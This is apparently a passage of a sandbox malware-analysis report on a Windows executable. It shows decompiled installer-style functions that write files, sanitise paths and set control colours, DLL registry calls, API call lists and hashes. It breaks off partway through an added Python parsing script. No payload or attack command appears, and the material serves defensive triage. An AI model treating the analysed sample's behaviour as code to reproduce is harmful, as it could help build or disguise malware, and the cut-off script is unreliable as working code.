                    					CloseHandle(E00405602(_t49, 0, 1));
                    					_t16 = GetShortPathNameA(_t49, 0x42c168, 0x400);
                    					if(_t16 != 0 && _t16 <= 0x400) {
                    						goto L5;
                    					}
                    				}
                    				return _t16;
                    			}

                    APIs
                      • Part of subcall function 00405C49: GetModuleHandleA.KERNEL32(?,?,00000000,00403126,00000008), ref: 00405C5B
                      • Part of subcall function 00405C49: LoadLibraryA.KERNELBASE(?,?,00000000,00403126,00000008), ref: 00405C66
                      • Part of subcall function 00405C49: GetProcAddress.KERNEL32(00000000,?), ref: 00405C77
                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,0040540E,?,00000000,000000F1,?), ref: 004056C6
                    • GetShortPathNameA.KERNEL32 ref: 004056CF
                    • GetShortPathNameA.KERNEL32 ref: 004056EC
                    • wsprintfA.USER32 ref: 0040570A
                    • GetFileSize.KERNEL32(00000000,00000000,0042BBE0,C0000000,00000004,0042BBE0,?,?,?,00000000,000000F1,?), ref: 00405745
                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 00405754
                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 0040576A
                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,0042B7E0,00000000,-0000000A,00409328,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057B0
                    • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 004057C2
                    • GlobalFree.KERNEL32 ref: 004057C9
                    • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 004057D0
                      • Part of subcall function 00405577: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040557E
                      • Part of subcall function 00405577: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004055AE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp
                    Similarity
                    • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
                    • String ID: %s=%s$[Rename]
                    • API String ID: 3772915668-1727408572
                    • Opcode ID: 4c02c2ac3e9ad1514aa896e9bf178216840010c0f99e66a1499b9443596943aa
                    • Instruction ID: f99a8e27a0ac237a4403d65adef5acaf7166b20d7f6f9042e90736f67bd768b8
                    • Opcode Fuzzy Hash: 4c02c2ac3e9ad1514aa896e9bf178216840010c0f99e66a1499b9443596943aa
                    • Instruction Fuzzy Hash: 8441D031604B15BBE6216B619C49F6B3A6CEF45754F100436F905F72C2EA78A801CEBD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • StringFromGUID2.OLE32(?,?,00000027), ref: 10001D13
                    • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 10001D6F
                    • StringFromGUID2.OLE32(00000000,?,00000027), ref: 10001D8A
                    • RegSetValueExW.ADVAPI32(?,Default,00000000,00000001,?,0000004E), ref: 10001DA3
                    • StringFromGUID2.OLE32(00000000,?,00000027), ref: 10001DB3
                    • RegSetValueExW.ADVAPI32(?,Profile,00000000,00000001,?,0000004E), ref: 10001DCC
                    • RegCloseKey.ADVAPI32(?), ref: 10001DD6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp
                    Similarity
                    • API ID: FromString$Value$CloseCreate
                    • String ID: %p) %x %s %s$%s\%s\0x%08x\%s$Assemblies$Default$Profile
                    • API String ID: 1318437696-2502594939
                    • Opcode ID: 05c5194d7e5d92c66f3e5826c9d0eec355b547a4f58760818b7c81c3d92d64a1
                    • Instruction ID: 27c13968a3118dc8c68f4443d35e60864bdd84783e5128327479ecbbaf901254
                    • Opcode Fuzzy Hash: 05c5194d7e5d92c66f3e5826c9d0eec355b547a4f58760818b7c81c3d92d64a1
                    • Instruction Fuzzy Hash: 75513AB5A40208BBEB10CFA4DC85FEE73B8FB48700F108559F605AB185D775EA44CB61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • StringFromGUID2.OLE32(?,?,00000027), ref: 100022D9
                    • StringFromGUID2.OLE32(?,?,00000027), ref: 100022E9
                    • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,0002001F,?), ref: 10002344
                    • RegQueryValueExW.ADVAPI32(?,Enable,00000000,00000000,00000000,00000004), ref: 1000236F
                    • RegCloseKey.ADVAPI32(?), ref: 1000237C
                    • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,0002001F,?), ref: 1000239F
                    • RegQueryValueExW.ADVAPI32(?,Enable,00000000,00000000,00000000,00000004), ref: 100023CA
                    • RegCloseKey.ADVAPI32(?), ref: 100023D7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp
                    Similarity
                    • API ID: CloseFromOpenQueryStringValue
                    • String ID: %s\%s\%s\0x%08x\%s$(%p) %s, %i, %s, %p$Enable$LanguageProfile
                    • API String ID: 193680167-3603924166
                    • Opcode ID: bf50fa3f48cea37b60e557fdb462d71aee76edc4478a5d4af328f6ae4ebc464b
                    • Instruction ID: 40391e074440fb52d83601e0a66853126ecbc3a5c3ce8c1250bbd2d5080af09d
                    • Opcode Fuzzy Hash: bf50fa3f48cea37b60e557fdb462d71aee76edc4478a5d4af328f6ae4ebc464b
                    • Instruction Fuzzy Hash: 3E412FB5900219FFEB10DF90CD89FEE77B8EB48340F108558FA19A6185D774AB84DBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • StringFromGUID2.OLE32(?,?,00000027), ref: 10002459
                    • StringFromGUID2.OLE32(?,?,00000027), ref: 10002469
                    • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,0002001F,?), ref: 100024C4
                    • RegSetValueExW.ADVAPI32(?,Enable,00000000,00000004,?,00000004), ref: 100024E6
                    • RegCloseKey.ADVAPI32(?), ref: 100024F0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp
                    Similarity
                    • API ID: FromString$CloseOpenValue
                    • String ID: %s\%s\%s\0x%08x\%s$(%p) %s %x %s %i$Enable$LanguageProfile
                    • API String ID: 3688305288-1256949467
                    • Opcode ID: f03e850746073d282dd987d0edd5d7caf8e3b523e648412af87769f60fdc9c94
                    • Instruction ID: 3d080639a5fd2197325cbe9e03500c8865ccd0ed7b3d72ff4c98c75b705f7c93
                    • Opcode Fuzzy Hash: f03e850746073d282dd987d0edd5d7caf8e3b523e648412af87769f60fdc9c94
                    • Instruction Fuzzy Hash: D4314FB6940219BBEB14DF94DC85FEE73B8EB49341F008058FA0996145E634EA949BA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • StringFromGUID2.OLE32(?,?,00000027), ref: 100021B9
                    • StringFromGUID2.OLE32(?,?,00000027), ref: 100021C9
                    • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,0002001F,?), ref: 10002224
                    • RegSetValueExW.ADVAPI32(?,Enable,00000000,00000004,?,00000004), ref: 10002246
                    • RegCloseKey.ADVAPI32(?), ref: 10002250
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp
                    Similarity
                    • API ID: FromString$CloseOpenValue
                    • String ID: %s\%s\%s\0x%08x\%s$(%p) %s %x %s %i$Enable$LanguageProfile
                    • API String ID: 3688305288-1256949467
                    • Opcode ID: f0c014063032bbd75d30b83dfac5fb48da85f70de656bc15ac6c8e9d452fed6d
                    • Instruction ID: fb3cb9da5819c23884a4b77f928473d1b313ab34d7c643c00f0768f96e8e8d25
                    • Opcode Fuzzy Hash: f0c014063032bbd75d30b83dfac5fb48da85f70de656bc15ac6c8e9d452fed6d
                    • Instruction Fuzzy Hash: EC3171F6900208BFEB10DFD4DC45FEE73B8EB49340F008058FA09A6145E734EA949BA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • StringFromGUID2.OLE32(?,?,00000027), ref: 100014BA
                    • StringFromGUID2.OLE32(?,?,00000027), ref: 100014CA
                    • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 1000152F
                    • RegSetValueExW.ADVAPI32(?,Enable,00000000,00000004,00000000,00000004), ref: 1000155E
                    • RegCloseKey.ADVAPI32(?), ref: 1000156E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp
                    Similarity
                    • API ID: FromString$CloseCreateValue
                    • String ID: %s\%s\%s\0x%08x\%s$Enable$LanguageProfile
                    • API String ID: 32363474-1306068423
                    • Opcode ID: 4e1f72c7d4bd86fa4041fda2954218bf90ae87b2140984ffc23d4f352f8ccb16
                    • Instruction ID: eb039ca75822e1645de2ad74749ae0bb4c02f0157e4a2942e20983e75e2c4b1d
                    • Opcode Fuzzy Hash: 4e1f72c7d4bd86fa4041fda2954218bf90ae87b2140984ffc23d4f352f8ccb16
                    • Instruction Fuzzy Hash: 10210CB5900318FBEB10DB90CC89FEEB7B8EB48701F108158F6196A185D774AA848BA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetProcessHeap.KERNEL32(00000008,00000070), ref: 100010AA
                    • HeapAlloc.KERNEL32(00000000), ref: 100010B1
                    • GetProcessHeap.KERNEL32(00000000,?), ref: 10001108
                    • HeapFree.KERNEL32(00000000), ref: 1000110F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp
                    Similarity
                    • API ID: Heap$Process$AllocFree
                    • String ID: returning %p
                    • API String ID: 756756679-1981732286
                    • Opcode ID: 75eca707130296f40e5c5b98ff7bbd53ddfb3e31bdf2205a41f9c8cc76739bb8
                    • Instruction ID: 1471c95420fb663fffc943fd2b11557840353f2bc27fe329463f806675b50420
                    • Opcode Fuzzy Hash: 75eca707130296f40e5c5b98ff7bbd53ddfb3e31bdf2205a41f9c8cc76739bb8
                    • Instruction Fuzzy Hash: 56211074A44204FBE710DFA0CC89BADB7B4EB49745F208048FA09AB395D775EE80DB55
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,0002001F,-00000039), ref: 1000305D
                    • RegEnumKeyExW.ADVAPI32(?,?,?,00000027,00000000,00000000,00000000,00000000), ref: 100030A6
                    • RegCloseKey.ADVAPI32(?), ref: 100030C5
                    • CLSIDFromString.OLE32(?,?), ref: 100030FE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp
                    Similarity
                    • API ID: CloseEnumFromOpenString
                    • String ID: %s\%s\0x%08x$'$LanguageProfile
                    • API String ID: 2638302380-2813637096
                    • Opcode ID: 59377314a68b51317bde71a37529f5d2b286c452b2dca7912ec117a53ce0b1b1
                    • Instruction ID: 130724da2326a449f1dba4cbb61217882b606c12bcd76e0e73fa58f95a325ca4
                    • Opcode Fuzzy Hash: 59377314a68b51317bde71a37529f5d2b286c452b2dca7912ec117a53ce0b1b1
                    • Instruction Fuzzy Hash: 1F61E5B5A00209EFDB04DF54C880BAABBB9FF48354F10C659F9199B385D770EA85CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00405B89(CHAR* _a4) {
                    				char _t5;
                    				char _t7;
                    				char* _t15;
                    				char* _t16;
                    				CHAR* _t17;
                    
                    				_t17 = _a4;
                    				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
                    					_t17 =  &(_t17[4]);
                    				}
                    				if( *_t17 != 0 && E0040548B(_t17) != 0) {
                    					_t17 =  &(_t17[2]);
                    				}
                    				_t5 =  *_t17;
                    				_t15 = _t17;
                    				_t16 = _t17;
                    				if(_t5 != 0) {
                    					do {
                    						if(_t5 > 0x1f &&  *((char*)(E00405449("*?|<>/\":", _t5))) == 0) {
                    							E004055C3(_t16, _t17, CharNextA(_t17) - _t17);
                    							_t16 = CharNextA(_t16);
                    						}
                    						_t17 = CharNextA(_t17);
                    						_t5 =  *_t17;
                    					} while (_t5 != 0);
                    				}
                    				 *_t16 =  *_t16 & 0x00000000;
                    				while(1) {
                    					_t16 = CharPrevA(_t15, _t16);
                    					_t7 =  *_t16;
                    					if(_t7 != 0x20 && _t7 != 0x5c) {
                    						break;
                    					}
                    					 *_t16 =  *_t16 & 0x00000000;
                    					if(_t15 < _t16) {
                    						continue;
                    					}
                    					break;
                    				}
                    				return _t7;
                    			}

                    APIs
                    • CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\U001P56ybm.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BE1
                    • CharNextA.USER32(?,?,?,00000000), ref: 00405BEE
                    • CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\U001P56ybm.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BF3
                    • CharPrevA.USER32(?,?,"C:\Users\user\Desktop\U001P56ybm.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405C03
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp
                    Similarity
                    • API ID: Char$Next$Prev
                    • String ID: "C:\Users\user\Desktop\U001P56ybm.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                    • API String ID: 589700163-1861984517
                    • Opcode ID: e0832ec2d912e5d74df0801281a3a7736ede427d3fd94c72d6daa08f5325fd7a
                    • Instruction ID: c1e19bc38f5928a16c8df4e3184f884ce5b3d56ade5c4132b49213cb44a1c68a
                    • Opcode Fuzzy Hash: e0832ec2d912e5d74df0801281a3a7736ede427d3fd94c72d6daa08f5325fd7a
                    • Instruction Fuzzy Hash: 41119351809B912DFB3216244C44B77BFA9CB96760F18447BE9D4622C2C6BCBC829B7D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			/* WM_CTLCOLOR* handler: _a4 = message, _a8 = HDC, _a12 = control HWND.
                    			   Only 0x133 (WM_CTLCOLOREDIT) .. 0x138 (WM_CTLCOLORSTATIC) are handled; the
                    			   per-control colour record is read from GWL_USERDATA (-21 = 0xffffffeb). */
                    			E00403D44(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                    				struct tagLOGBRUSH _v16;
                    				long _t35;
                    				long _t37;
                    				void* _t40;
                    				long* _t49;   /* colour record: [0] text, [1] bk, [2] brush style, [3] brush, [4] bk mode, [5] flags */
                    
                    				if(_a4 + 0xfffffecd > 5) {   /* (message - 0x133) > 5, unsigned */
                    					L15:
                    					return 0;
                    				}
                    				_t49 = GetWindowLongA(_a12, 0xffffffeb);   /* GWL_USERDATA */
                    				if(_t49 == 0) {
                    					goto L15;
                    				}
                    				_t35 =  *_t49;
                    				if((_t49[5] & 0x00000002) != 0) {   /* text colour is a COLOR_* index */
                    					_t35 = GetSysColor(_t35);
                    				}
                    				if((_t49[5] & 0x00000001) != 0) {   /* apply text colour */
                    					SetTextColor(_a8, _t35);
                    				}
                    				SetBkMode(_a8, _t49[4]);
                    				_t37 = _t49[1];
                    				_v16.lbColor = _t37;
                    				if((_t49[5] & 0x00000008) != 0) {   /* background colour is a COLOR_* index */
                    					_t37 = GetSysColor(_t37);
                    					_v16.lbColor = _t37;
                    				}
                    				if((_t49[5] & 0x00000004) != 0) {   /* apply background colour */
                    					SetBkColor(_a8, _t37);
                    				}
                    				if((_t49[5] & 0x00000010) != 0) {   /* (re)create the background brush, freeing the previous one */
                    					_v16.lbStyle = _t49[2];
                    					_t40 = _t49[3];
                    					if(_t40 != 0) {
                    						DeleteObject(_t40);
                    					}
                    					_t49[3] = CreateBrushIndirect( &_v16);
                    				}
                    				return _t49[3];   /* HBRUSH handed back to the dialog manager */
                    			}

                    Addresses (one per decompiled statement, in order): 0x00403d56 0x00403dea 0x00000000 0x00403dea 0x00403d67 0x00403d6b 0x00000000 0x00000000 0x00403d71 0x00403d7a 0x00403d7d 0x00403d7d 0x00403d83 0x00403d89 0x00403d89 0x00403d95 0x00403d9b 0x00403da2 0x00403da5 0x00403da8 0x00403daa 0x00403daa 0x00403db2 0x00403db8 0x00403db8 0x00403dc2 0x00403dc7 0x00403dca 0x00403dcf 0x00403dd2 0x00403dd2 0x00403de2 0x00403de2 0x00000000

                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp
                    Similarity
                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                    • String ID:
                    • API String ID: 2320649405-0
                    • Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                    • Instruction ID: ac003594d1dcb8ae4d3b01263828f587cf1b0240a4208d46790e3dc2010cfdd8
                    • Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                    • Instruction Fuzzy Hash: 58218471904744ABC7219F78DD08B9B7FFCAF01715F048A29E895E22E0D739E904CB55
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 86%
                    			/* Writes an in-memory image out as a file: a 0x8200-byte buffer (size held at
                    			   0x42eb74) is filled from a (length, offset, data...) record list, written in one
                    			   WriteFile, and the file is deleted again if the write fails. E00405602(name,
                    			   0x40000000, 2) is called with GENERIC_WRITE / CREATE_ALWAYS, i.e. a CreateFile
                    			   wrapper the decompiler did not resolve; _t47 (ebx) holds 0 throughout and is typed
                    			   _OVERLAPPED* only because it is passed as lpOverlapped. _t24 is a decompiler artefact. */
                    			E0040266E(struct _OVERLAPPED* __ebx) {
                    				void* _t27;
                    				long _t32;
                    				struct _OVERLAPPED* _t47;
                    				void* _t51;
                    				void* _t53;
                    				void* _t56;
                    				void* _t57;
                    				void* _t58;
                    
                    				_t47 = __ebx;
                    				 *(_t58 - 8) = 0xfffffd66;
                    				_t52 = E004029E8(0xfffffff0);   /* target file name */
                    				 *(_t58 - 0x44) = _t24;
                    				if(E0040548B(_t52) == 0) {
                    					E004029E8(0xffffffed);
                    				}
                    				E004055E3(_t52);
                    				_t27 = E00405602(_t52, 0x40000000, 2);   /* GENERIC_WRITE, CREATE_ALWAYS */
                    				 *(_t58 + 8) = _t27;
                    				if(_t27 != 0xffffffff) {   /* INVALID_HANDLE_VALUE */
                    					_t32 =  *0x42eb74; // 0x8200
                    					 *(_t58 - 0x2c) = _t32;
                    					_t51 = GlobalAlloc(0x40, _t32);   /* 0x40 = GPTR: fixed, zero-initialised */
                    					if(_t51 != _t47) {
                    						E00403098(_t47);
                    						E00403066(_t51,  *(_t58 - 0x2c));
                    						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
                    						 *(_t58 - 0x30) = _t56;
                    						if(_t56 != _t47) {
                    							E00402E44( *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c));
                    							while( *_t56 != _t47) {   /* each record: [0] length, [4] offset into buffer, [8..] data */
                    								_t49 =  *_t56;
                    								_t57 = _t56 + 8;
                    								 *(_t58 - 0x38) =  *_t56;
                    								E004055C3( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);   /* copy data to buffer + offset */
                    								_t56 = _t57 +  *(_t58 - 0x38);
                    							}
                    							GlobalFree( *(_t58 - 0x30));
                    						}
                    						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x2c), _t58 - 8, _t47);
                    						GlobalFree(_t51);
                    						 *(_t58 - 8) = E00402E44(0xffffffff,  *(_t58 + 8), _t47, _t47);
                    					}
                    					CloseHandle( *(_t58 + 8));
                    				}
                    				_t53 = 0xfffffff3;
                    				if( *(_t58 - 8) < _t47) {   /* write failed: remove the partial file and flag the error */
                    					_t53 = 0xffffffef;
                    					DeleteFileA( *(_t58 - 0x44));
                    					 *((intOrPtr*)(_t58 - 4)) = 1;
                    				}
                    				_push(_t53);
                    				E00401423();
                    				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t58 - 4));   /* running error count */
                    				return 0;
                    			}

                    Addresses (one per decompiled statement, in order): 0x0040266e 0x00402670 0x0040267c 0x0040267f 0x00402689 0x0040268d 0x0040268d 0x00402693 0x004026a0 0x004026a8 0x004026ab 0x004026b1 0x004026bf 0x004026c4 0x004026c8 0x004026cb 0x004026d4 0x004026e0 0x004026e4 0x004026e7 0x004026f1 0x00402710 0x004026f8 0x004026fd 0x00402705 0x00402708 0x0040270d 0x0040270d 0x00402717 0x00402717 0x00402729 0x00402730 0x00402742 0x00402742 0x00402748 0x00402748 0x00402753 0x00402754 0x00402758 0x0040275c 0x00402762 0x00402762 0x00402769 0x00402156 0x00402880 0x0040288c

                    APIs
                    • GlobalAlloc.KERNEL32(00000040,00008200,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026C2
                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026DE
                    • GlobalFree.KERNEL32 ref: 00402717
                    • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402729
                    • GlobalFree.KERNEL32 ref: 00402730
                    • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402748
                    • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040275C
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp
                    Similarity
                    • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                    • String ID:
                    • API String ID: 3294113728-0
                    • Opcode ID: 1fe56166fb6cd4dbd5b8f8a47f0c0769986a224b60575e965902ed59b0249d4b
                    • Instruction ID: 8136da2242d6e6cba5f284f27b64b1989b358de0d737458f3662c87ad7b72ced
                    • Opcode Fuzzy Hash: 1fe56166fb6cd4dbd5b8f8a47f0c0769986a224b60575e965902ed59b0249d4b
                    • Instruction Fuzzy Hash: 4A318B71C00128BBDF216FA9CD49DAE7E79EF05324F10822AF520762E0C7795D419BA9
                    Uniqueness

                    Uniqueness Score: -1.00%
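                    The "APIs" and "Strings" bullets in these records (one per call site, with the argument values the sandbox observed and the call-site address after "ref:") are easier to triage as structured records than one function at a time. The following Python is an added example, not part of the sandbox report or of the sample's own code: it parses bullets in that shape, maps each call site to the image it lives in using the two dump bases listed under "Memory Dump Source" (0x00400000 and 0x10000000; which module each base belongs to is an assumption of the example), buckets the calls by behaviour (registry, file, memory, UI) and collects the literal arguments the sandbox resolved, such as the temp-file path passed to RegSetValueExA. The sample lines embedded in the block are constructed in the shape of this page's entries, not copied from it verbatim.

```python
"""Parse the per-function 'APIs' / 'Strings' bullets of a sandbox listing
into records and summarise them by image and behaviour category."""
import re
from collections import defaultdict

# Constructed sample in the shape of this report's entries (example data).
SAMPLE_LISTING = """\
APIs
• GlobalAlloc.KERNEL32(00000040,00008200,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026C2
• GlobalFree.KERNEL32 ref: 00402717
• WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402729
• DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040275C
Strings
• verifying installer: %d%%, xrefs: 00402B7D
APIs
• RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402333
• RegSetValueExA.ADVAPI32(?,?,?,?,C:\\Users\\user\\AppData\\Local\\Temp\\nsi3BDD.tmp,00000000), ref: 0040238C
• RegOpenKeyExW.ADVAPI32(?,?,00000000,0002001F,?), ref: 10003499
"""

API_RE = re.compile(
    r"^•\s*(?P<api>\w+)\.(?P<module>\w+)"       # API name and exporting module
    r"(?:\((?P<args>.*)\))?"                   # optional observed argument list
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"  # call-site address
)

# Image bases from the report's "Memory Dump Source" lines; the labels
# (which module sits at which base) are an assumption of this example.
IMAGE_BASES = {0x00400000: "main image @ 0x00400000",
               0x10000000: "DLL image @ 0x10000000"}

CATEGORIES = {
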